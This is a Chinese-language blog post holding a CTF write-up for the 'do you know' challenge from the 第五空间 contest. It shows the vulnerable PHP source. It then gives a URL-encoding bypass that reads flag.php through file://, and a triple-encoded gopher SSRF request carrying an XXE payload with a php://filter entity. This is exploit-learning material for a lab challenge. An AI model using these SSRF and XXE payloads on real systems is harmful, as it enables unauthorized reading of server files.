<!DOCTYPE HTML>
<html>

<head>
	<link rel="bookmark"  type="image/x-icon"  href="/img/logo_miccall.png"/>
	<link rel="shortcut icon" href="/img/logo_miccall.png">
	
			    <title>
    ico's Blog
    </title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
    <link rel="stylesheet" href="/css/mic_main.css" />
    <link rel="stylesheet" href="/css/dropdownMenu.css" />
    <meta name="keywords" content="miccall" />
    
    	<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	 
    <noscript>
        <link rel="stylesheet" href="/css/noscript.css" />
    </noscript>
    <style type="text/css">
        body:before {
          content: ' ';
          position: fixed;
          top: 0;
          background: url('/img/bg.jpg') center 0 no-repeat;
          right: 0;
          bottom: 0;
          left: 0;
          background-size: cover; 
        }
    </style>

			    
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script async type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


    <script src="/js/jquery.min.js"></script>
    <script src="/js/jquery.scrollex.min.js"></script>
    <script src="/js/jquery.scrolly.min.js"></script>
    <script src="/js/skel.min.js"></script>
    <script src="/js/util.js"></script>
    <script src="/js/main.js"></script>
	
<meta name="generator" content="Hexo 4.2.1"></head>
    
		
<!-- Layouts -->



<!--  代码渲染  -->
<link rel="stylesheet" href="/css/prism_coy.css" />
<link rel="stylesheet" href="/css/typo.css" />
<!-- 文章页 -->
<body class="is-loading">
    <!-- Wrapper 外包 s-->
    <div id="wrapper" class="fade-in">
        <!-- Intro 头部显示 s -->
        <!-- Intro 头部显示 e -->
        <!-- Header 头部logo start -->
        <header id="header">
    <a href="/" class="logo">MICCALL</a>
</header>
        <!-- Nav 导航条 start -->
        <nav id="nav" class="special" >
            <ul class="menu links" >
			<!-- Homepage  主页  --> 
			<li >
	            <a href="/" rel="nofollow">主页</a>
	        </li>
			<!-- categories_name  分类   --> 
	        
	        <li class="active">
	            <a href="#s1">分类</a>
	                    <ul class="submenu">
	                        <li>
	                        <a class="category-link" href="/categories/buuctf/">buuctf</a></li><li><a class="category-link" href="/categories/dasctf/">dasctf</a></li><li><a class="category-link" href="/categories/xjpc-ctf/">xjpc-ctf</a></li><li><a class="category-link" href="/categories/%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B4/">第五空间</a>
	                    </ul>
	        </li>
	        
	        <!-- archives  归档   --> 
	        
	        
		        <!-- Pages 自定义   -->
		        
		        <li>
		            <a href="/about/" title="简历">
		                简历
		            </a>
		        </li>
		        
		        <li>
		            <a href="/group/" title="团队">
		                团队
		            </a>
		        </li>
		        
		        <li>
		            <a href="/gallery/" title="图库">
		                图库
		            </a>
		        </li>
		        
		        <li>
		            <a href="/tag/" title="标签">
		                标签
		            </a>
		        </li>
		        


            </ul>
            <!-- icons 图标   -->
			<ul class="icons">
                    
                    <li>
                        <a title="github" href="https://github.com/miccall" target="_blank" rel="noopener">
                            <i class="icon fa fa-github"></i>
                        </a>
                    </li>
                    
                    <li>
                        <a title="500px" href="http://500px.com" target="_blank" rel="noopener">
                            <i class="icon fa fa-500px"></i>
                        </a>
                    </li>
                    
			</ul>
</nav>

        <div id="main" >
            <div class ="post_page_title_img" style="height: 25rem;background-image: url(https://s1.ax1x.com/2020/07/16/UrusV1.jpg);background-position: center; background-repeat:no-repeat; background-size:cover;-moz-background-size:cover;overflow:hidden;" >
                <a href="#" style="padding: 4rem 4rem 2rem 4rem ;"><h2 >do you know</h2></a>
            </div>
            <!-- Post -->
            <div class="typo" style="padding: 3rem;">
                <h1 id="第五空间"><a href="#第五空间" class="headerlink" title="第五空间"></a>第五空间</h1><h2 id="do-you-know"><a href="#do-you-know" class="headerlink" title="do you know"></a>do you know</h2><p>源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">#本题无法访问外网</span><br><span class="line">#这题真没有其他文件，请不要再开目录扫描器了，有的文件我都在注释里面告诉你们了</span><br><span class="line">#各位大佬...这题都没有数据库的存在...麻烦不要用工具扫我了好不好</span><br><span class="line">#there is xxe.php</span><br><span class="line">$poc&#x3D;$_SERVER[&#39;QUERY_STRING&#39;];</span><br><span class="line">if(preg_match(&quot;&#x2F;log|flag|hist|dict|etc|file|write&#x2F;i&quot; ,$poc))&#123;</span><br><span class="line">                die(&quot;no hacker&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">$ids&#x3D;explode(&#39;&amp;&#39;,$poc);</span><br><span class="line">$a_key&#x3D;explode(&#39;&#x3D;&#39;,$ids[0])[0];</span><br><span class="line">$b_key&#x3D;explode(&#39;&#x3D;&#39;,$ids[1])[0];</span><br><span class="line">$a_value&#x3D;explode(&#39;&#x3D;&#39;,$ids[0])[1];</span><br><span class="line">$b_value&#x3D;explode(&#39;&#x3D;&#39;,$ids[1])[1];</span><br><span class="line"></span><br><span class="line">if(!$a_key||!$b_key||!$a_value||!$b_value)</span><br><span class="line">&#123;</span><br><span class="line">        die(&#39;我什么都没有~&#39;);</span><br><span class="line">&#125;</span><br><span class="line">if($a_key&#x3D;&#x3D;$b_key)</span><br><span class="line">&#123;</span><br><span class="line">    die(&quot;trick&quot;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if($a_value!&#x3D;&#x3D;$b_value)</span><br><span class="line">&#123;</span><br><span class="line">        if(count($_GET)!&#x3D;1)</span><br><span class="line">        &#123;</span><br><span class="line">                die(&#39;be it so&#39;);</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br><span class="line">foreach($_GET as $key&#x3D;&gt;$value)</span><br><span class="line">&#123;</span><br><span class="line">        $url&#x3D;$value;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$ch &#x3D; curl_init();</span><br><span class="line">    if ($type !&#x3D; &#39;file&#39;) &#123;</span><br><span class="line">        #add_debug_log($param, &#39;post_data&#39;);</span><br><span class="line">        &#x2F;&#x2F; 设置超时</span><br><span class="line">        curl_setopt($ch, CURLOPT_TIMEOUT, 30);</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        &#x2F;&#x2F; 设置超时</span><br><span class="line">        curl_setopt($ch, CURLOPT_TIMEOUT, 180);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    curl_setopt($ch, CURLOPT_URL, $url);</span><br><span class="line">    curl_setopt($ch, CURLOPT_POST, true);</span><br><span class="line">    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);</span><br><span class="line">    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);</span><br><span class="line"></span><br><span class="line">    &#x2F;&#x2F; 设置header</span><br><span class="line">    if ($type &#x3D;&#x3D; &#39;file&#39;) &#123;</span><br><span class="line">        $header[] &#x3D; &quot;content-type: multipart&#x2F;form-data; charset&#x3D;UTF-8&quot;;</span><br><span class="line">        curl_setopt($ch, CURLOPT_HTTPHEADER, $header);</span><br><span class="line">    &#125; elseif ($type &#x3D;&#x3D; &#39;xml&#39;) &#123;</span><br><span class="line">        curl_setopt($ch, CURLOPT_HEADER, false);</span><br><span class="line">    &#125; elseif ($has_json) &#123;</span><br><span class="line">        $header[] &#x3D; &quot;content-type: application&#x2F;json; charset&#x3D;UTF-8&quot;;</span><br><span class="line">        curl_setopt($ch, CURLOPT_HTTPHEADER, $header);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    &#x2F;&#x2F; curl_setopt($ch, CURLOPT_USERAGENT, &#39;Mozilla&#x2F;4.0 (compatible; MSIE 5.01; </span><br><span class="line">    Windows NT 5.0)&#39;);</span><br><span class="line">    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);</span><br><span class="line">    curl_setopt($ch, CURLOPT_AUTOREFERER, 1);</span><br><span class="line">    &#x2F;&#x2F; dump($param);</span><br><span class="line">    curl_setopt($ch, CURLOPT_POSTFIELDS, $param);</span><br><span class="line">    &#x2F;&#x2F; 要求结果为字符串且输出到屏幕上</span><br><span class="line">    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);</span><br><span class="line">    &#x2F;&#x2F; 使用证书：cert 与 key 分别属于两个.pem文件</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    $res &#x3D; curl_exec($ch);</span><br><span class="line">    var_dump($res);</span><br></pre></td></tr></table></figure>

<p>看到curl_exec啥的，本来应该是ssrf+xxe，用gopher打，但出题人致命失误，先代码审计一下。</p>
<p>上面$ids把我们传入的两个值分开以&amp;，$a_key第一个变量的键名，$a_value是第一个变量的键值，同理b。</p>
<p>代码审计，第一个if就是判断四个值都有没有，第二个if</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">if($a_key&#x3D;&#x3D;$b_key)</span><br><span class="line">&#123;</span><br><span class="line">    die(&quot;trick&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>让我们键名不可以相同</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">if($a_value!&#x3D;&#x3D;$b_value)</span><br><span class="line">&#123;</span><br><span class="line">        if(count($_GET)!&#x3D;1)</span><br><span class="line">        &#123;</span><br><span class="line">                die(&#39;be it so&#39;);</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里如果两个键值不相同就判断传入参数个数，直接gg，所以只能传入两个相同的值绕过。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">foreach($_GET as $key&#x3D;&gt;$value)</span><br><span class="line">&#123;</span><br><span class="line">        $url&#x3D;$value;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>接着遍历我们的键名键值，将url赋值为我们传入的键值，然后接着就是启动一个会话进行我们的ssrf攻击了。</p>
<p>这里出题人提示的很明确，无关的代码都标出了它的含义。那些代码都是我们不需要关心的，都是服务器的执行流程；这里显然在会话的开始就提示了我们使用file协议，但是我们源码刚开始的一个匹配过滤了file协议，现在就是怎么绕过的问题。</p>
<p>出题人的致命失误</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$poc&#x3D;$_SERVER[&#39;QUERY_STRING&#39;];</span><br></pre></td></tr></table></figure>

<p>详情可到学习</p>
<p>因为QUERY_STRING不会urldecode，所以只需进行url编码绕过就行了。</p>
<p>本题只需把字母啥的都urlencode就直接bypass了正则，然后就随便打了，直接curl一下</p>
<p>file:///var/www/html/flag.php即可，想读什么都行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?a&#x3D;%66%69%6c%65%3a%2f%2f%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%66%6c%61%67%2e%70%68%70&amp;b&#x3D;%66%69%6c%65%3a%2f%2f%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%66%6c%61%67%2e%70%68%70</span><br></pre></td></tr></table></figure>

<h4 id="预期解："><a href="#预期解：" class="headerlink" title="预期解："></a>预期解：</h4><p>学习一下操作，用<code>gopher</code>进行<code>ssrf</code>发送<code>post</code>请求给<code>xxe.php</code></p>
<p>大致就是用gopher协议访问内网。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">?a&#x3D;1&amp;b&#x3D;1&amp;c&#x3D;gopher:&#x2F;&#x2F;127.0.0.1:80&#x2F;_POST%2520&#x2F;xxe.php%2520HTTP&#x2F;1.1%250d%250aHost%3a127.0.0.1%</span><br><span class="line">3a80%250d%250aAccept%3a*&#x2F;*%250d%250aContent-Length%3a611%250d%250aContent-Type%3aapplication&#x2F;x-www-form-urlencoded%250d%250a%250d%250adata&#x3D;%25253c%25253f%252578%25256d%25256c%252520%252576%25256</span><br><span class="line">5%252572%252573%252569%25256f%25256e%25253d%252522%252531%25252e%252530%252522%252520%2525</span><br><span class="line">65%25256e%252563%25256f%252564%252569%25256e%252567%25253d%252522%252575%252572%252565%252</span><br><span class="line">561%252564%252574%252566%25252d%252538%252522%25253f%25253e%25250a%25253c%252521%252544%25</span><br><span class="line">254f%252543%252554%252559%252550%252545%252520%252578%252565%252520%25255b%25250a%25253c%2</span><br><span class="line">52521%252545%25254c%252545%25254d%252545%25254e%252554%252520%25256e%252561%25256d%252565%</span><br><span class="line">252520%252541%25254e%252559%252520%25253e%25250a%25253c%252521%252545%25254e%252554%252549</span><br><span class="line">%252554%252559%252520%252578%252565%252520%252553%252559%252553%252554%252545%25254d%25252</span><br><span class="line">0%252522%252570%252568%252570%25253a%25252f%25252f%252566%252569%25256c%252574%252565%2525</span><br><span class="line">72%25252f%252572%252565%252572%252565%252561%252564%252561%252564%25253d%252563%25256f%252</span><br><span class="line">56e%252576%252565%252572%252574%25252e%252562%252561%252573%252565%252536%252534%25252d%25</span><br><span class="line">2565%25256e%252563%25256f%252564%252565%25252f%252572%252565%252573%25256f%252575%252572%2</span><br><span class="line">52563%252565%25253d%252566%25256c%252572%252565%252561%252564%252561%252567%25252e%252570%</span><br><span class="line">252568%252570%252522%252520%25253e%25255d%25253e%25250a%25253c%252572%25256f%25256f%252574</span><br><span class="line">%25253e%25250a%25253c%25256e%252561%25256d%252565%25253e%252526%252578%252565%25253b%25253</span><br><span class="line">c%25252f%25256e%252561%25256d%252565%25253e%25250a%25253c%25252f%252572%25256f%25256f%2525</span><br><span class="line">74%25253e</span><br></pre></td></tr></table></figure>

<p>首先分析一下前一部分</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">gopher:&#x2F;&#x2F;127.0.0.1:80&#x2F;_POST%2520&#x2F;xxe.php%2520HTTP&#x2F;1.1%250d%250aHost%3a127.0.0.1%3a80%250d%</span><br><span class="line">250aAccept%3a*&#x2F;*%250d%250aContent-Length%3a611%250d%250aContent-Type%3aapplication&#x2F;x-www-</span><br><span class="line">form-urlencoded</span><br></pre></td></tr></table></figure>

<h5 id="注意必须包括端口，否则gopher访问不到"><a href="#注意必须包括端口，否则gopher访问不到" class="headerlink" title="注意必须包括端口，否则gopher访问不到"></a>注意必须包括端口，否则<code>gopher</code>访问不到</h5><p>由于<code>gopher</code>协议传递数据包的时候会将第一个字符吞掉，所以我们在前面加一个<code>_</code>，然后后面接数据包</p>
<p>数据包有很多请求头，但只有一部分是必须的</p>
<p>上面的第一部分下列请求头的url编码（包括换行<code>%0d%0a</code>，而且这儿需要将<code>%</code>进行二次编码）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;xee.php HTTP&#x2F;1.1</span><br><span class="line">HOST:127.0.0.1:80</span><br><span class="line">Accept:*&#x2F;*</span><br><span class="line">Content-Length:611</span><br><span class="line">Content-Type:application&#x2F;x-www-form-urlencoded</span><br></pre></td></tr></table></figure>

<h4 id="POST发送数据的时候，数据于请求头中间有两个-0d-0a"><a href="#POST发送数据的时候，数据于请求头中间有两个-0d-0a" class="headerlink" title="POST发送数据的时候，数据于请求头中间有两个%0d%0a"></a>POST发送数据的时候，数据于请求头中间有两个<code>%0d%0a</code></h4><p>这个Content-Length:611表示发送数据的大小<br>例如我们POST data=xxx，则Content-Length为8，无论你进行多少次url编码，都会将我们发送的数据解码成data=xxx，所以有时候我们进行多次url编码，但是服务器还是能识别，这就是Content-Length的作用</p>
<p>我们知道这道题目实际就是gopher进行xxe攻击，我们只需要用gopher发送一个能读取文件的xml过去就可以了，而且实际题目有一些过滤，双写绕过就行了，所以随便找个能读文件的xml如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version&#x3D;&quot;1.0&quot; encoding&#x3D;&quot;ureadtf-8&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE xe [</span><br><span class="line">&lt;!ELEMENT name ANY &gt;</span><br><span class="line">&lt;!ENTITY xe SYSTEM &quot;php:&#x2F;&#x2F;filter&#x2F;rereadad&#x3D;convert.base64-encode&#x2F;resource&#x3D;flreadag.php&quot; &gt;]&gt;</span><br><span class="line">&lt;root&gt;</span><br><span class="line">&lt;name&gt;&amp;xe;&lt;&#x2F;name&gt;</span><br><span class="line">&lt;&#x2F;root&gt;</span><br></pre></td></tr></table></figure>

<p>这儿还有一个需要注意的点<br>我们在计算长度的时候不能直接计算明文的长度，这是因为上面的字符有一些特殊字符，而这些特殊字符又有实际的含义，例如&amp;<br>假设我们只计算明文的长度，则不管我们怎么url编码，服务器都会解析成明文的格式<br>即访问xxe.php是发送的数据为data=&lt;?xml version=”1.0” enco….这样就会包含特殊符号，就不能正确传输数据</p>
<p>正确的做法是：<br>1、对payload（即xml）所以字符进行url编码，计算编码后的长度，例上面的xml编码后长度为606，加上data=，总长度为610<br>2、先把编码后的数据加在data=的后面<br>3、直接在burpsuite里面编码（只对特殊字符编码即可，即%，因为GET方法有长度限制，如果编码太长不能发送请求）（再编两次码，总共对xml三次编码，因为我们发送请求时浏览器本身会编一次码，然后gopher发送数据时也会编码一次，所以只有编码三次，到达xxe.php的数据才是xml第一次编码之后的数据，否则直接是明文数据，不能有效传递xml，如果编码四次也不行，只能三次，这只是针对特殊字符的）<br>4、burpsuite对特殊字符编码的地方</p>
<p><img src="../../public/img/1.jpg" alt=""></p>
<p>最后base64解码得到flag。真的学到了很多操作。加油！！！</p>

            </div>

            <!-- Post Comments -->
            
    <!-- 使用 DISQUS_CLICK -->
<div id="disqus-comment">
    <div id="disqus_thread"></div>

<!-- add animation -->
<style>
	.disqus_click_btn {
            line-height: 30px;
            margin: 0;
            min-width: 50px;
            padding: 0 14px;
            display: inline-block;
            font-family: "Roboto", "Helvetica", "Arial", sans-serif;
            font-size: 14px;
            font-weight: 400;
            text-transform: uppercase;
            letter-spacing: 0;
            overflow: hidden;
            will-change: box-shadow;
            transition: box-shadow .2s cubic-bezier(.4, 0, 1, 1), background-color .2s cubic-bezier(.4, 0, .2, 1), color .2s cubic-bezier(.4, 0, .2, 1);
            outline: 0;
            cursor: pointer;
            text-decoration: none;
            text-align: center;
            vertical-align: middle;
            border: 0;
            background: rgba(158, 158, 158, .2);
            box-shadow: 0 2px 2px 0 rgba(0, 0, 0, .14), 0 3px 1px -2px rgba(0, 0, 0, .2), 0 1px 5px 0 rgba(0, 0, 0, .12);
            color: #fff;
            background-color: #7EC0EE;
            text-shadow: 0
        }
</style>
	
<div class="btn_click_load" id="disqus_bt"> 
    <button class="disqus_click_btn">点击查看评论</button>
</div>

<!--
<script type="text/javascript">
$('.btn_click_load').click(function() {
    /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
    var disqus_shortname = 'http-miccall-tech'; // required: replace example with your forum shortname

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
      var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
      dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
      (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();

    document.getElementById('disqus_bt').style.display = "none";
});
</script>
-->
<script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'https://cuony.github.io/2020/07/24/%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B4/';  // Replace PAGE_URL with your page's canonical URL variable
        this.page.identifier = 'https://cuony.github.io/2020/07/24/%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B4/'; // Replace PAGE_IDENTIFIER with your page's unique identifier variable
    };
</script>

<script type="text/javascript">
    $('.btn_click_load').click(function() {  //click to load comments
        (function() { // DON'T EDIT BELOW THIS LINE
            var d = document;
            var s = d.createElement('script');
            s.src = '//http-miccall-tech.disqus.com/embed.js';
            s.setAttribute('data-timestamp', + new Date());
            (d.head || d.body).appendChild(s);
        })();
        $('.btn_click_load').css('display','none');
    });
</script>
</div>
<style>
    #disqus-comment{
        background-color: #eee;
        padding: 2pc;
    }
</style>


        </div>
        <!-- Copyright 版权 start -->
                <div id="copyright">
            <ul>
                <li>&copy;Powered By <a href="https://hexo.io/zh-cn/" target="_blank" rel="noopener" style="border-bottom: none;">hexo</a></li>
                <li>Design: <a href="http://miccall.tech " target="_blank" rel="noopener" style="border-bottom: none;">miccall</a></li>
            </ul>
            
                <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
			
        </div>
    </div>
</body>



 	
</html>
